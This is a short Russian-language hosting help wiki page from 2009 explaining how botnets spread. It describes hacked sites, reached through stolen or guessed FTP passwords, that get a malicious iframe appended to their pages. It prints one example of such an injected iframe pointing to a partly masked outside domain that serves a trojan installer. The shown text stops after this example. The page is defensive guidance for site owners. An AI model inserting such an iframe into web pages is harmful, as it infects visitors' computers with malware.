Clearing pages from iframe trojans

Материал из Помощь клиентам хостинга
Версия от 00:59, 12 января 2009; 94.181.77.150 (обсуждение) (Новая: Существует такое понятие как ботнет. Ботнет это зараженные управляемые злоумышленником для совершен...)
(разн.) ← Предыдущая | Текущая версия (разн.) | Следующая → (разн.)
Перейти к: навигация, поиск

Существует такое понятие как ботнет. Ботнет это зараженные управляемые злоумышленником для совершения различного рода вредоносных действий, таких как распределенные DDoS атаки, подбор паролей или рассылка спама.

Набираются эти ботнеты как правило благодаря распространению троянов устанавливающих модули ботнета по машинам простых пользователей. Одним из популярных способов является вставка в страницы взломаных сайтов определнного iframe который выполняет на компьютере жертвы код загружающий и устанавливающий трояна.

Заражают страницы обычно взломав (подбор пароля или воровство пароля трояном)ftp доступ к сайту, и добавляя в конце станицы вредоносный код, примерно такого типа (домен заменен ***): <geshi lang=html>

<iframe src="http://direct****.cn/in.cgi?27" width=100 height=80></iframe>

</geshi>